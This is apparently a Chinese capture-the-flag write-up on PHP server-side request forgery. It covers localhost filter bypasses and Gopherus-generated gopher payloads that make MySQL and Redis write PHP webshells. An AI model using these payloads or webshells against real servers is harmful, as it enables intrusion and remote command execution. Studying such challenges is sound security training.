php中SSRF的介绍以及用法
php中SSRF的介绍以及用法,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
web351
curl_init - 初始化 cURL 会话
curl_setopt - 设置一个cURL传输选项。
CURLOPT_HEADER | 启用时会将头文件的信息作为数据流输出。 |
---|---|
URLOPT_RETURNTRANSFER | 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。 |
curl_exec - 执行 cURL 会话
curl_close - 关闭 cURL 会话
如果我们直接访问,会输出
非本地用户禁止访问
所以需ssrf读取flag, payload:
# POSTurl=http://127.0.0.1/flag.php
web352~过滤127.0.0,localhost
hacker
parse_url - 解析 URL,返回其组成部分
这里过滤了/localhost|127.0.0/
,
假的吧,都可以出来,
url=http://localhost/flag.phpurl=http://127.0.0.1/flag.php
在本地尝试尝试绕过:
ping 127.0.1ping 127.1ping 0x7F.0.0.1ping 0177.0.0.1
题目尝试也可绕过。
web353
hacker
直接绕过:
url=http://127.1/flag.phpurl=http://0x7F.0.0.1/flag.phpurl=http://0177.0.0.1/flag.php
web354
hacker
直接把1
和·0
也给过滤了。
可以
将自己域名A记录指向
127.0.0.1
[http://sudo.cc/](http://sudo.cc/)
正好指向127.0.0.1302跳转
web355
hacker这里要求
$x['host']
长度不大于5.直接,
127.1
正好是5url=http://127.1/flag.php还可找一个域名长度不大于5的域名 A 记录解析到
127.0.0.1
.web356
hacker这回更绝,长度不大于 3 .
0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0
payload:
url=http://0/flag.phpweb357
'.$ip.'';if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) { die('ip!');}echo file_get_contents($_POST['url']);}else{ die('scheme');}?> scheme域名解析到vps,
ssrf.php
web358
正则表达式的意思是以http://ctf.开头,以show结尾。
payload:
url=http://ctf.@127.0.0.1/flag.php?showweb359~打mysql
打无密码的mysqlhttps://www.freebuf.com/articles/web/260806.html
git clone https://github.com/tarunkant/Gopherus.gitpython gopherus.py[root@p1 Gopherus]# python gopherus.py --exploit mysql ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ >\/ |__| \/ \/ \/ author: $_SpyD3r_$For making it work username should not be password protected!!!Give MySQL username: rootGive query to execute: select '' into outfile '/var/www/html/ma.php';Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%85%a6%ff%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%5f%6f%73%4c%69%6e%75%78%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%6c%69%62%6d%79%73%71%6c%5f%70%69%64%32%37%32%35%35%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%78%38%36%5f%36%34%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%6d%79%73%71%6c%47%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%61%2e%70%68%70%27%3b然后传到check.php中post: returl=xxxxx,但是不要忘了把下划线后面的内容url编码一次.
浏览器会对此url进行一次解码,解码后的url可能会含特殊字符,curl提交时需再次编码.
returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%256d%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501之后就会生成
ma.php
.web360~打redis
和上题差不多
[root@p1 Gopherus]# python gopherus.py --exploit redis ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ >\/ |__| \/ \/ \/ author: $_SpyD3r_$Ready To get SHELLWhat do you want?? (ReverseShell/PHPShell): PHPshellGive web root location of server (default is /var/www/html): Give PHP Payload (We have default PHP Shell): =system('ls /');?>Your gopher link is Ready to get PHP Shell: gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2424%0D%0A%0A%0A%3C%3F%3Dsystem%28%27ls%20/%27%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0AWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。